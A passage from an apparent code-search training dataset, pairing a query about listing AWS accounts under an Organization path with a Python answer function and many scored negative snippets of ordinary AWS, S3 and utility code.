final_species_path_list = []\n\n while path_queue != []:\n\n ###print \"\\nget_path: path queue:\",path_queue\n\n path_queue,\\\n final_operon_path_list,\\\n final_species_path_list = traverse(input_dictionary,\n output_dictionary,\n input_species_list,\n output_species_list,\n path_queue,\n final_operon_path_list,\n final_species_path_list)\n\n return final_operon_path_list, final_species_path_list", "def walk2(dirname):\n for root, dirs, files in os.walk(dirname):\n for filename in files:\n print(os.path.join(root, filename))", "def walk2(dirname):\n for root, dirs, files in os.walk(dirname):\n for filename in files:\n print(os.path.join(root, filename))", "def test_get_namespaces_from_accounts(self):\n pass", "def get_is_org_user(carto_sql_client):\n resp = carto_sql_client.send('SHOW search_path')\n paths = resp['rows'][0]['search_path'].split(',')\n\n # if 'public' is first element, user is not in an org\n return bool(paths[0] != 'public')", "def pathlookup(obj_or_path_tuple, depth=None, include_origin=True):", "def retrieve_catalog_for_path(self, needle_path):\n clg = self.retrieve_root_catalog()\n while True:\n new_nested_reference = clg.find_nested_for_path(needle_path)\n if new_nested_reference is None:\n break\n nested_reference = new_nested_reference\n clg = self.retrieve_catalog(nested_reference.hash)\n return clg" ]
[ "0.5943409", "0.5662944", "0.5541912", "0.5307396", "0.52833915", "0.52833915", "0.51416296", "0.51335", "0.5058733", "0.5023612", "0.50106674", "0.4983386", "0.49637613", "0.49609458", "0.49326625", "0.49166146", "0.49147454", "0.49008152", "0.4848601", "0.48095214", "0.47985002", "0.47953928", "0.47874194", "0.47285697", "0.47135007", "0.46970645", "0.46951032", "0.46913072", "0.46748507", "0.46727067", "0.46497136", "0.46039099", "0.459378", "0.44992596", "0.44972956", "0.44966474", "0.44873047", "0.44873047", "0.44654134", "0.4463726", "0.44586426", "0.44139174", "0.44068617", "0.43931967", "0.43776104", "0.43738896", "0.4367782", "0.4366889", "0.4360955", "0.43528494", "0.43450752", "0.43413115", "0.431553", "0.43110156", "0.43039268", "0.42890534", "0.42808124", "0.4280474", "0.424959", "0.42452484", "0.42417586", "0.4241041", "0.42398405", "0.42391065", "0.42386153", "0.42231768", "0.42198518", "0.42129278", "0.42119274", "0.42019406", "0.42015767", "0.41942757", "0.4193471", "0.41927716", "0.41921586", "0.4180584", "0.41593373", "0.41591674", "0.41563115", "0.4148069", "0.41473687", "0.4140578", "0.41347983", "0.4129648", "0.41278774", "0.41259313", "0.41185403", "0.41178146", "0.41002464", "0.40996888", "0.40978476", "0.40801254", "0.40772355", "0.40760005", "0.40701333", "0.40701333", "0.40675542", "0.40493363", "0.4047335", "0.40403423" ]
0.7749507
0
given a path, get all the AWS accounts within that part of an Organization...
def get_accounts_for_ou(logger, options, org_client, path): logger.debug("Getting accounts for OU: %s", path) org_unit = get_ou_from_path(logger, org_client, path) ous = [] if options.no_recursive: ous.append(org_unit) else: ous.extend(get_child_ous(logger, org_client, org_unit)) result = [] for org_unit in ous: args = {"ParentId":org_unit["Id"]} accounts = utils.generic_paginator(logger, org_client.list_accounts_for_parent, "Accounts", **args) for acc in accounts: acc["Path"] = org_unit["Path"] if 'Status' in acc: if acc['Status'] != 'SUSPENDED': result.append(acc) else: logger.info("found suspended account %s, ignoring it." % acc) return result
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def organizations(self):\n return self.get('{}/orgs'.format(ApiVersion.A1.value))", "def ls():\n return dynamodb.ls(OrganizationModel)", "async def get_organizations(request: Request):\n redis = request.app.state.redis\n organizations_obj = orjson.loads(await redis.get_key(\"influxdb_organizations\"))\n return [org for org in organizations_obj]", "def get_account():\n\n bus = session_bus()\n\n goa_manager = bus.get_object(GOA_NAME, GOA_PATH)\n\n goa_objects = goa_manager.GetManagedObjects(dbus_interface=OBJECT_MANAGER)\n\n accounts = [\n obj for obj in goa_objects\n if obj != GOA_MANAGER_PATH\n ]\n\n if len(accounts) > 1:\n sys.exit(\"More than one account found.\")\n\n (account_path,) = accounts\n\n return bus.get_object(GOA_NAME, account_path)", "def get_buckets_for_user(self):\n s3 = self.credentials.session.resource('s3')\n bucket_list = [bucket.name for bucket in s3.buckets.all()]\n\n return bucket_list;", "def organizations(self):\n self.elements('organizations')", "def test_get_namespaces_from_account(self):\n pass", "def list_all_organizations(ctx):\n pprint(ctx.obj.orgs.get().data)", "def test_get_namespaces_from_accounts(self):\n pass", "def _get_arns(self):\n client = self._get_client()\n\n account_arns = set()\n\n for role in list_roles(**self.conn_details):\n account_arns.add(role['Arn'])\n\n for user in list_users(**self.conn_details):\n account_arns.add(user['Arn'])\n\n for page in client.get_paginator('list_policies').paginate(Scope='Local'):\n for policy in page['Policies']:\n account_arns.add(policy['Arn'])\n\n for page in client.get_paginator('list_groups').paginate():\n for group in page['Groups']:\n account_arns.add(group['Arn'])\n\n result_arns = set()\n for arn in self.arn_list:\n if arn.lower() == 'all':\n return account_arns\n\n if arn not in account_arns:\n self.current_app.logger.warn(\"Provided ARN {arn} not found in account.\".format(arn=arn))\n continue\n\n result_arns.add(arn)\n\n self.current_app.logger.debug(\"got %d arns\", len(result_arns))\n return list(result_arns)", "def fetch_account_catalogs(account:str):\n for config in accounts:\n if account in config['streamers']:\n return config['catalogs']\n return", "def get_accounts(self):\n uri = '/credentials'\n response = gate_request(uri=uri)\n assert response.ok, 'Failed to get accounts: {0}'.format(response.text)\n\n all_accounts = response.json()\n self.log.debug('Accounts in Spinnaker:\\n%s', all_accounts)\n\n filtered_accounts = []\n for account in all_accounts:\n if account['type'] == self.provider:\n filtered_accounts.append(account)\n\n if not filtered_accounts:\n raise ForemastError('No Accounts matching {0}.'.format(self.provider))\n\n return filtered_accounts", "def _recurse(self) -> Iterator[str]:\n\n client: s3.Client = boto3.client('s3')\n\n decoded_url = urlparse(self.url)\n bucket_name = decoded_url.netloc\n\n paginator = client.get_paginator('list_objects_v2')\n\n page_iterator: PageIterator = paginator.paginate(\n Bucket=bucket_name,\n Prefix=decoded_url.path.lstrip('/'),\n )\n\n for page in page_iterator:\n records = page.get('Contents', [])\n\n for record in records:\n key = record['Key']\n yield f's3://{bucket_name}/{key}'", "def fetch_accounts(self):\n return self.fetch('/accounts')", "def get_organization_links(self):\n yield from self.get_resource_by_item(\"/orgs\")", "def accountId():\n # save the lookup if we set the account to the environment\n if \"AWS_ACCOUNT_ID\" in os.environ:\n return os.environ[\"AWS_ACCOUNT_ID\"]\n conn = iamConn()\n funcs = [\n lambda: conn.get_user().get('get_user_response')\\\n .get('get_user_result').get('user').get('arn'),\n lambda: conn.list_roles(max_items=1).get('list_roles_response')\\\n .get('list_roles_result').get('roles')[0].get('arn'),\n ]\n for func in funcs:\n try:\n arn = func()\n break\n except (boto.exception.BotoServerError, IndexError):\n pass\n return arn.split(':')[4]", "def parse_common_organization_path(path: str) -> Dict[str, str]:\n m = re.match(r\"^organizations/(?P<organization>.+?)$\", path)\n return m.groupdict() if m else {}", "def parse_common_organization_path(path: str) -> Dict[str, str]:\n m = re.match(r\"^organizations/(?P<organization>.+?)$\", path)\n return m.groupdict() if m else {}", "def get_accounts(self, session: \"Session\") -> List[Account]:\n\n self.__get_dn(session)\n\n result = session.soapclient.get_accounts_by_owner(self.dn)\n return [Account(session, account=r) for r in result]", "def accounts(web3):\n return web3.eth.accounts", "def fetch_owner_accounts():\n resp = oauth.tapkey.get('Owners')\n owner_accounts = resp.json()\n return owner_accounts", "def get_organization_links_by_page(self):\n return self.get_resource_by_page(\"/orgs\")", "def find_by_account(cls,account):\n for credentials in cls.credential_list:\n if credentials.account == account:\n return credentials", "def get_orgs():\n \n url = \"https://api.github.com/user/orgs\"\n \n org_urls = []\n orgs = utils.get_json(url)\n \n for org in orgs:\n org_urls.append(org[\"url\"])\n \n return org_urls", "def test_get_all_for_organization(self):\n org = Organization.create(name='foo', program_id=self.program.uid)\n org.put()\n user = User.create(name='foo', email='foo@bar.com',\n owned_organizations=[org.uid])\n user.put()\n response = self.testapp.get(\n '/api/organizations/{}/users'.format(org.uid),\n headers=self.login_headers(user),\n )\n response_list = json.loads(response.body)\n self.assertEqual(len(response_list), 1)", "def amazon_accounts():\n import json\n from security_monkey.datastore import Account, AccountType\n from os.path import dirname, join\n\n data_file = join(dirname(dirname(__file__)), \"data\", \"aws_accounts.json\")\n data = json.load(open(data_file, 'r'))\n\n app.logger.info('Adding / updating Amazon owned accounts')\n try:\n account_type_result = AccountType.query.filter(AccountType.name == 'AWS').first()\n if not account_type_result:\n account_type_result = AccountType(name='AWS')\n db.session.add(account_type_result)\n db.session.commit()\n db.session.refresh(account_type_result)\n\n for group, info in data.items():\n for aws_account in info['accounts']:\n acct_name = \"{group} ({region})\".format(group=group, region=aws_account['region'])\n account = Account.query.filter(Account.identifier == aws_account['account_id']).first()\n if not account:\n app.logger.debug(' Adding account {0}'.format(acct_name))\n account = Account()\n else:\n app.logger.debug(' Updating account {0}'.format(acct_name))\n\n account.identifier = aws_account['account_id']\n account.account_type_id = account_type_result.id\n account.active = False\n account.third_party = True\n account.name = acct_name\n account.notes = info['url']\n\n db.session.add(account)\n\n db.session.commit()\n app.logger.info('Finished adding Amazon owned accounts')\n except Exception as e:\n app.logger.exception(\"An error occured while adding accounts\")\n store_exception(\"manager-amazon-accounts\", None, e)", "def get_creds(bucket_name, folder_name):\n client = boto3.client('sts')\n # pprint(client.get_caller_identity())\n\n # A name of our choice (no spaces allowed)\n credential_name = f'AccessTimeline-{folder_name}'\n policy = {\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n # A name of our choice [0-9a-zA-Z]\n \"Sid\": f'ListBucket{folder_name}',\n \"Action\": [\n \"s3:ListBucket\",\n ],\n \"Effect\": \"Allow\",\n \"Resource\": [\n f'arn:aws:s3:::{bucket_name}',\n ],\n \"Condition\": {\n \"StringEquals\": {\n \"s3:prefix\": [\n f'{folder_name}/'\n ],\n \"s3:delimiter\": [\n '/'\n ],\n }\n }\n\n },\n {\n \"Sid\": f'GetObject{folder_name}',\n \"Action\": [\n \"s3:GetObject\",\n ],\n \"Effect\": \"Allow\",\n \"Resource\": [\n f'arn:aws:s3:::{bucket_name}/{folder_name}/*',\n ],\n\n # FIXME: it should be possible to place restrictions using Condition,\n # but I haven't been able to get this to work.\n #\n # \"Condition\": {\n # \"StringLike\": {\n # \"s3:prefix\": [\n # f'{folder_name}/*'\n # ],\n # \"s3:delimiter\": [\n # '/'\n # ],\n # }\n # }\n },\n ]\n }\n\n # pprint(policy)\n policy = json.dumps(policy)\n credential_lifetime = 900 # 900 seconds is the minimum value\n\n creds = client.get_federation_token(\n Name=credential_name,\n Policy=policy,\n DurationSeconds=credential_lifetime,\n )\n\n # pprint(creds)\n return creds['Credentials']", "def list_buckets():\n for bucket in s3.buckets.all():\n print(bucket)", "def listOrganizations(self, name='', type=''):\n return self.get_json('/organization', {'name': name, 'type': type})", "def Accounts(self):\n\n if not self.connected:\n return []\n\n try:\n accounts_listing = _ReadNoProxy(\n GOOGLE_GCE_METADATA_ACCOUNTS_URI + '/')\n accounts_lines = accounts_listing.split()\n accounts = []\n for account_line in accounts_lines:\n account = account_line.strip('/')\n if account == 'default':\n continue\n accounts.append(account)\n return accounts\n except urllib2.HTTPError as e:\n raise MetadataServerException(e)\n except urllib2.URLError as e:\n raise CannotConnectToMetadataServerException(e)", "def test_get_all_organization(self):\n self.client.force_authenticate(user=self.inventory_manager)\n response = self.client.get(\"/organization/\")\n self.assertEqual(response.status_code,\n status.HTTP_403_FORBIDDEN)", "def organizations(self) -> pulumi.Output[Optional[Sequence[str]]]:\n return pulumi.get(self, \"organizations\")", "def get_s3_keys(bucket, user_keys = None):\n keys = []\n if user_keys is None:\n \t\t\t\ts3 = boto3.client('s3')\n else:\n s3 = boto3.client('s3', \n aws_access_key_id = user_keys[\"AWS_ACCESS_KEY_ID\"], \n aws_secret_access_key = user_keys[\"AWS_SECRET_ACCESS_KEY\"], \n region_name = user_keys[\"REGION_NAME\"]\n ) \t \n \n resp = s3.list_objects_v2(Bucket= bucket)\n for obj in resp['Contents']:\n keys.append(obj['Key'])\n return keys", "def organizations(self):\r\n return organizations.Organizations(self)", "def search_accounts(request, client):\n try:\n result = client(SearchRequest(request, 10))\n return result\n except Exception as e:\n logging.warning(e)\n return []", "def ls(region_name=DEFAULT_REGION):\n s3conn = s3.connect_to_region(region_name)\n buckets = s3conn.get_all_buckets()\n for bucket in buckets:\n print(bucket.name)", "def atlas_organizations():\n pass", "def common_organization_path(organization: str,) -> str:\n return \"organizations/{organization}\".format(organization=organization,)", "def iterate_bucket_objects(self, bucket):\n client = self.credentials.session.client('s3')\n page_iterator = client.list_objects_v2(Bucket=bucket)\n if 'Contents' not in page_iterator:\n return []\n for item in page_iterator['Contents']:\n yield item", "def _generate_accounts(self):\n accounts = []\n auth_url = 'http://{}:5000/v3/'.format(self.host)\n\n for tenant, network in self.tenants:\n account = RwcalYang.CloudAccount.from_dict({\n 'name': 'rift.auto.openstack',\n 'account_type': 'openstack',\n 'openstack': {\n 'key': self.user or self._DEFAULT_USERNAME,\n 'secret': self._DEFAULT_PASSWORD,\n 'auth_url': auth_url,\n 'tenant': tenant,\n 'mgmt_network': network}})\n\n accounts.append(account)\n\n return accounts", "def accounts(self):\n # get the summary data\n options = { 'PayLoadText' : self.request_xml() }\n\n print(self.url)\n print(options)\n\n response = requests.get(self.url, params=options) \\\n .content\n print(response)\n xml_tree = xml.etree.cElementTree.fromstring(response)\n\n status = xml_tree.find('ServiceResponse/Status').text\n\n if status != 'success':\n raise requests.exceptions.RequestException()\n\n self.security_token = xml_tree.find('ClientSecurityToken').text\n\n accounts = [ \n self.create_account(account)\n for account in xml_tree.iter('CardAccounts')\n ]\n\n return accounts", "def load_accounts(path):\n with open(path, 'r') as f:\n acc = [x.strip() for x in f.readlines()]\n return acc", "def organization_list(request):\n return [o.slug for o in Organization.objects.all()]", "def accounts(self):\r\n return resources.Accounts(self)", "def get_addresses_by_account(account):\n try:\n stdout = subprocess.check_output([\"litecoin-cli\", \"getaddressesbyaccount\", account])\n addresses = json.loads(stdout.decode())\n except:\n sys.exit(1)\n\n return addresses", "def account_keys(chain):\n return chain.backend.account_keys", "def get_users_from_account(self, path=None, user_name=None, user_id=None,\n delegate_account=None, search=False):\n self.log.debug('Attempting to fetch all access matching- user_id:' +\n str(user_id) + ' user_name:' + str(user_name) + \" acct_name:\" +\n str(delegate_account))\n retlist = []\n params = {}\n if search:\n re_meth = re.search\n else:\n re_meth = re.match\n if delegate_account:\n params['DelegateAccount'] = delegate_account \n response = self.get_response_items('ListUsers', params, item_marker='users',\n list_marker='Users')\n for user in response:\n if path is not None and not re_meth(path, user['path']):\n continue\n if user_name is not None and not re_meth(user_name, user['user_name']):\n continue\n if user_id is not None and not re_meth(user_id, user['user_id']):\n continue\n retlist.append(user)\n return retlist", "def test_retrieve_l_organizations(self):\n pass", "def get_accounts(self):\n return self.accounts", "async def get_user_account(self):\n uri = \"/v3/spot/assets\"\n success, error = await self.request(\"GET\", uri, auth=True)\n return success, error", "def _get_available_regions():\n session = boto3.session.Session()\n\n return session.get_available_regions(service_name='s3')", "def accounts():", "def test_get_all_for_other_organization(self):\n org = Organization.create(name='foo', program_id=self.program.uid)\n org.put()\n user = User.create(name='foo', email='foo@bar.com')\n user.put()\n response = self.testapp.get(\n '/api/organizations/{}/users'.format(org.uid),\n headers=self.login_headers(user),\n status=403\n )", "def GetAccountList(self):\n\t\treturn self.accounts.keys()", "def get_accounts(self):\r\n return self._accounts", "def users(self,org_id=None):\n if org_id is None:\n org_id = self.org_id\n return self.get('{}/orgs/{}/users'.format(ApiVersion.A1.value,org_id))", "def service_accounts(self) -> Sequence[str]:\n return pulumi.get(self, \"service_accounts\")", "def fetch_organization(organization):\n return fetch_json(organization_url, organization)", "def _list_orgs(self, context):\r\n try:\r\n rtn = {'context': context,\r\n 'orgs': sorted(list(self._bbreader.cache[context].keys()))}\r\n except KeyError:\r\n raise RequestError('Context {} not found'.format(context))\r\n return rtn", "def list_s3_resources(memberAccountId=None, nextToken=None, maxResults=None):\n pass", "def list_storage_accounts(resource_group_name=None):\n scf = storage_client_factory()\n if resource_group_name:\n accounts = scf.storage_accounts.list_by_resource_group(resource_group_name)\n else:\n accounts = scf.storage_accounts.list()\n return list(accounts)", "def get_accessible_spaces(user):\n if not user:\n return []\n obj_list = get_objects_for_user(user, 'access_space',Space)\\\n .order_by('-created_at')\n return obj_list", "def get_all_in_region(self, cloud_account_id: str, region_id: str) -> List[Dict]:\n\t\tquery_parameters = {'cloudAccountId': cloud_account_id, 'regionId': region_id}\n\t\treturn self._get(route=AWSSecurityGroupConsts.CLOUD_SECURITY_GROUP.value, params=query_parameters)", "def get_accounts(self):\n\n\t\treturn self.__accounts", "def list_accounts(self):\n pass", "def keys(self, bucket, user=None):\n raise NotImplementedError('TODO')", "def common_organization_path(\n organization: str,\n ) -> str:\n return \"organizations/{organization}\".format(\n organization=organization,\n )", "def getProjectsQueryForOrgs(org_keys):\n query = getProjectsQuery()\n query.filter('org IN', org_keys)\n return query", "def get_payee_accounts(payee: str) -> list[str]:\n return g.ledger.attributes.payee_accounts(payee)", "def get_matching_s3_keys(client, bucket, prefix=\"\", suffix=\"\"):\n\n for obj in get_matching_s3_objects(client, bucket, prefix, suffix):\n yield obj[\"Key\"]", "def account(request):\n def searchAccounts(prop, domain, added, response):\n prefix = request.GET.get('q').lower()\n limit = _clean_int(request.GET.get('limit'), 10, 10, 100)\n\n accounts_query = models.Account.query(\n prop >= prefix, prop < prefix + u\"\\ufffd\").order(prop)\n for account in accounts_query:\n if account.blocked:\n continue\n if account.key in added:\n continue\n if domain and not account.email.endswith(domain):\n continue\n if len(added) >= limit:\n break\n added.add(account.key)\n response += '%s (%s)\\n' % (account.email, account.nickname)\n return added, response\n\n added = set()\n response = ''\n domain = os.environ['AUTH_DOMAIN']\n if domain != 'gmail.com':\n # 'gmail.com' is the value AUTH_DOMAIN is set to if the app is running\n # on appspot.com and shouldn't prioritize the custom domain.\n added, response = searchAccounts(\n models.Account.lower_email, domain, added, response)\n added, response = searchAccounts(\n models.Account.lower_nickname, domain, added, response)\n\n added, response = searchAccounts(\n models.Account.lower_nickname, \"\", added, response)\n added, response = searchAccounts(\n models.Account.lower_email, \"\", added, response)\n return HttpTextResponse(response)", "def get_usofa_account_ids(bucketname):\n usofa_data = _get_usofa_data(bucketname)\n return [account_data['id'] for account_data in usofa_data.values()]", "def myorgs(request):\n context = RequestContext(request)\n \n user = request.user\n orgs = user.orgusers.get_query_set()\n \n context['orgs'] = orgs\n return render_to_response('myorgs.html', context)", "def get_organizations(\n self, *, params: Optional[dict] = None\n ) -> \"resource_types.Organizations\":\n\n return communicator.Organizations(self.__requester).fetch(parameters=params)", "def test_getorgs(self):\n pass", "def get_accounts(self):\n return self.accounts.all()", "def organizations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"organizations\")", "def organizations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"organizations\")", "def find_aws_credentials(profile):\n if not profile:\n access_key = None\n secret_key = None\n region = None\n token = \"\"\n credentials = botocore.session.get_session().get_credentials()\n if credentials:\n access_key = credentials.access_key\n secret_key = credentials.secret_key\n region = credentials.region\n token = getattr(credentials, \"token\") or \"\"\n if not access_key or not secret_key:\n raise RuntimeError(\"No Default AWS profile set\")\n\n ret = {\n \"aws_access_key_id\": access_key,\n \"aws_secret_access_key\": secret_key,\n \"aws_session_token\": token,\n }\n # only add the region if it is defined\n if region:\n ret[\"region\"] = region\n\n return ret\n else:\n\n folder = os.path.join(os.path.expanduser(\"~\"), \".aws\")\n filename = os.path.join(folder, \"credentials\")\n cfg = configparser.ConfigParser()\n with open(filename) as fp:\n cfg.read_file(fp)\n ret = {}\n if profile not in cfg:\n raise RuntimeError(\n \"No AWS profile '%s' found in %s\" % (profile, filename)\n )\n for key in cfg[profile]:\n ret[key] = cfg[profile][key]\n return ret", "def get_all_users(self, account_name=None, account_id=None, path=None,\n user_name=None, user_id=None, search=False ):\n userlist=[]\n accounts = self.get_all_accounts(account_id=account_id, account_name=account_name,\n search=search)\n for account in accounts:\n #if account['account_id'] == self.account_id:\n # access =self.get_users_from_account()\n #else:\n if account.get('account_id') == self.eucarc.account_id:\n delegate_account = None\n else:\n delegate_account = account['account_name']\n users = self.get_users_from_account(path=path,\n user_name=user_name,\n user_id=user_id,\n delegate_account=delegate_account,\n search=search)\n for user in users:\n user['account_name']=account['account_name']\n user['account_id']=account['account_id']\n userlist.append(user)\n return userlist", "def get_ad_entries(cohesity_client):\n resp = cohesity_client.active_directory.get_active_directory_entry()\n if resp:\n ad_list = list()\n for each_ad in resp:\n ad_list.append(each_ad.domain_name)\n config_dict[each_ad.domain_name] = [\n \"username\", \"password\", \"machine_accounts\"]\n exported_res_dict[\"Active directories\"] = ad_list\n return resp", "def accounts(self):\n return self._accounts.values()", "def get_organization_details(self):\n\n # Returns 1) OU Name to OU ID mapping (dict)\n # key: OU Name (in the manifest); value: OU ID (at root level)\n # 2) all OU IDs under root (dict)\n org = Organizations(self.logger)\n all_ou_ids, ou_name_to_id_map = self._get_ou_ids(org)\n\n # Returns 1) active accounts (list) under an OU.\n # use case: used to validate accounts in the manifest file\n # 2) Accounts for each OU at the root level.\n # use case: map OU Name to account IDs\n # key: OU ID (str); value: Active accounts (list)\n accounts_in_all_ous, ou_id_to_account_map = \\\n self._get_accounts_in_ou(org, all_ou_ids)\n\n # Returns account name in manifest to account id mapping.\n # key: account name; value: account id\n name_to_account_map = self.get_account_for_name(org)\n\n return accounts_in_all_ous, ou_id_to_account_map, \\\n ou_name_to_id_map, name_to_account_map", "def list_buckets():\n for bucket in BUCKET_MANAGER.all_buckets():\n print(bucket)", "def get_objects(self, bucket, s3_client=None):\n\n try:\n all_objects = s3_client.list_objects_v2(Bucket=bucket)\n except botocore.exceptions.EndpointConnectionError:\n logging.error(\"Couldn't connect to an S3 endpoint. If you're using an S3 compatible provider other than AWS, remember to set --s3-endpoint-url\")\n sys.exit(1)\n\n if 'Contents' in all_objects.keys():\n all_objects = [ k['Key'] for k in [ obj for obj in all_objects['Contents'] ]] # pylint: disable=unnecessary-comprehension\n else:\n all_objects = []\n\n return all_objects", "def get_bucketlist():\n pass", "def get_storage_account_list(credentials: Credentials, subscription_id: str) -> List[Dict]:\n try:\n client = get_client(credentials, subscription_id)\n storage_account_list = list(map(lambda x: x.as_dict(), client.storage_accounts.list()))\n\n # ClientAuthenticationError and ResourceNotFoundError are subclasses under HttpResponseError\n except ClientAuthenticationError as e:\n logger.warning(f\"Client Authentication Error while retrieving storage accounts - {e}\")\n return []\n except ResourceNotFoundError as e:\n logger.warning(f\"Storage Account not found error - {e}\")\n return []\n except HttpResponseError as e:\n logger.warning(f\"Error while retrieving storage accounts - {e}\")\n return []\n\n for storage_account in storage_account_list:\n x = storage_account['id'].split('/')\n storage_account['resourceGroup'] = x[x.index('resourceGroups') + 1]\n\n return storage_account_list", "def get_regions_in_partition(self, prefix=None, delimiter='/'):\n if prefix is None:\n prefix = self.s3_path\n else:\n prefix = self._strip_slashes(prefix)\n\n query_params = {\n 'Bucket': self.s3_bucket,\n 'Prefix': prefix + '/',\n 'Delimiter': delimiter\n }\n\n # We currently should be able to get all regions in a single request\n # TODO: Fail if we get a next token - there's more to this prefix than meets the eye\n region_list = []\n response = self.s3_client.list_objects_v2(**query_params)\n for c_prefix in response.get('CommonPrefixes', []):\n region = self._extract_region_from_prefix(c_prefix)\n if region:\n region_list.append(region)\n\n return region_list", "def service_account(configure_security: None) -> Iterator[Dict[str, Any]]:\n yield from tls._service_account_impl(configure_security)", "def get_acls():\n return config.get_cfg_storage(ID_ACL)", "def asset_get():\n search_assets = request.args.getlist(\"name\")\n find_assets = []\n for asset_name in search_assets:\n if asset_name in app.bank:\n find_assets.append(app.bank[asset_name].to_list())\n find_assets = sorted(find_assets, key=lambda s: s[0])\n return jsonify(find_assets)", "def get_accounts(self):\n\n data = {\n 'customerId': self.personal_identity_number,\n 'responseControl': {\n 'filter': {\n 'includes': ['ALL']\n }\n }\n }\n\n headers = {'Content-type': 'application/json',\n 'Accept': 'application/json',\n 'CSRFToken': self.json_token}\n path = '/im/json/overview/getaccounts'\n req = self.session.post(\n self.BASE_URL + path,\n data=json.dumps(data),\n headers=headers)\n\n for account in req.json()['response']['accounts']:\n self.accounts[account['number']] = account\n del(self.accounts[account['number']]['number'])\n\n return self.accounts", "def get_arns(profile, cluster, started_by=None):\n result = None\n client = boto3client.get(\"ecs\", profile)\n params = {}\n params[\"cluster\"] = cluster\n if started_by:\n params[\"startedBy\"] = started_by\n return client.list_tasks(**params)", "def get_all_reservations(config):\n reservations = []\n region_list = regions(aws_access_key_id=config.keys.api,\n aws_secret_access_key=config.keys.secret)\n for region in region_list:\n _logger.info(\"Searching %s\", region)\n cnx = region.connect(aws_access_key_id=config.keys.api,\n aws_secret_access_key=config.keys.secret)\n for reservation in cnx.get_all_instances():\n _logger.info(\"Found %s %s\", reservation,\n [str(i.id) for i in reservation.instances])\n reservations.append(reservation)\n return reservations", "async def la() -> Tuple[str]:\n li = []\n async with _create_client() as client:\n for bucket in (await client.list_buckets())['Buckets']:\n _ = await client.list_objects(Bucket=bucket['Name'])\n for item in _['Contents']:\n if item['Key'].endswith('/') is False:\n li.append(bucket['Name'] + '/' + item['Key'])\n logger.info('List all objects in all buckets.')\n return tuple(li)", "def get_matching_s3_objects(client, bucket, prefix=\"\", suffix=\"\"):\n\n kwargs = {\"Bucket\": bucket}\n if isinstance(prefix, str):\n kwargs[\"Prefix\"] = prefix\n # logging.info(\"kwargs: %s\" % kwargs)\n while True:\n resp = client.list_objects_v2(**kwargs)\n try:\n contents = resp[\"Contents\"]\n except KeyError:\n return\n for obj in contents:\n key = obj[\"Key\"]\n if key.startswith(prefix) and key.endswith(suffix):\n yield obj\n try:\n kwargs[\"ContinuationToken\"] = resp[\"NextContinuationToken\"]\n except KeyError:\n break", "def assets_search(ctx, text, pretty):\n ocean = ctx.obj['ocean']\n response = ocean.search(text, pretty)\n echo(response)", "def get_buckets(args):\n\n args.suppress_verify_output = True\n if verify(args) != 0:\n # restore stdout\n sys.stdout = sys.__stdout__\n print(\"Config file not valid, please use the verify function to debug\")\n return []\n\n with open(args.file, \"r\") as f:\n config_json = json.load(f)\n\n buckets = []\n for group in config_json[\"groups\"]:\n for bucket in group[\"buckets\"]:\n buckets.append(group[\"name\"] + \"/\" + bucket[\"name\"])\n return buckets", "def list_orgs(self):\n orgs = list(self.orgs.keys())\n orgs.sort()\n return orgs", "def access(config, region, accounts=()):\n config = validate.callback(config)\n accounts_report = []\n\n def check_access(account):\n accounts_report.append(account)\n session = get_session(account['role'], region)\n identity = session.client('sts').get_caller_identity()\n account['account_id'] = identity['Account']\n account.pop('groups')\n account.pop('role')\n client = session.client('iam')\n policy_arn = identity['Arn']\n if policy_arn.count('/') > 1:\n policy_arn = policy_arn.rsplit('/', 1)[0]\n if ':sts:' in policy_arn:\n policy_arn = policy_arn.replace(':sts', ':iam')\n if ':assumed-role' in policy_arn:\n policy_arn = policy_arn.replace(':assumed-role', ':role')\n evaluation = client.simulate_principal_policy(\n PolicySourceArn=policy_arn,\n ActionNames=['logs:CreateExportTask'])['EvaluationResults']\n account['access'] = evaluation[0]['EvalDecision']\n\n with ThreadPoolExecutor(max_workers=16) as w:\n futures = {}\n for account in config.get('accounts', ()):\n if accounts and account['name'] not in accounts:\n continue\n futures[w.submit(check_access, account)] = None\n for f in as_completed(futures):\n pass\n accounts_report.sort(key=operator.itemgetter('access'), reverse=True)\n print(tabulate(accounts_report, headers='keys'))" ]
[ "0.5892514", "0.5680063", "0.5646794", "0.5550604", "0.5464335", "0.5430682", "0.5372216", "0.5369034", "0.53668135", "0.53542835", "0.5335564", "0.5326624", "0.53066283", "0.5276022", "0.5273535", "0.52497715", "0.5233608", "0.5233608", "0.5214551", "0.5214118", "0.52107763", "0.5200044", "0.51917666", "0.5191017", "0.51906574", "0.518239", "0.51757336", "0.5162156", "0.5157345", "0.50720674", "0.49868813", "0.49844575", "0.49792635", "0.49750638", "0.49555397", "0.4951665", "0.49330264", "0.4918615", "0.4911662", "0.49111983", "0.4885512", "0.48835906", "0.48819765", "0.48563516", "0.48405048", "0.4833911", "0.48321855", "0.4825422", "0.48225924", "0.48074907", "0.48065007", "0.4800443", "0.47986984", "0.47933704", "0.47875172", "0.47830665", "0.47826758", "0.47820073", "0.4777325", "0.47746515", "0.4769064", "0.47682372", "0.47681522", "0.47638002", "0.4760509", "0.475963", "0.47585303", "0.4755685", "0.4749292", "0.47372445", "0.47270283", "0.47257784", "0.47215122", "0.47197208", "0.47189757", "0.47145712", "0.4713038", "0.4713038", "0.47050312", "0.47041196", "0.47008273", "0.46999246", "0.4697282", "0.46935987", "0.46884435", "0.46871746", "0.4679508", "0.4666458", "0.46651807", "0.46529445", "0.46417633", "0.46369332", "0.46349275", "0.46346894", "0.46332097", "0.46324986", "0.46315184", "0.46257138", "0.46257126", "0.46232027" ]
0.63345224
0
Checks globals() and builtins for the existence of the object name (used for StuWareSoftSystems' bootstrap)
def checkObjectInNameSpace(objectName): if objectName is None or not isinstance(objectName, basestring) or objectName == u"": return False if objectName in globals(): return True return objectName in dir(builtins)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
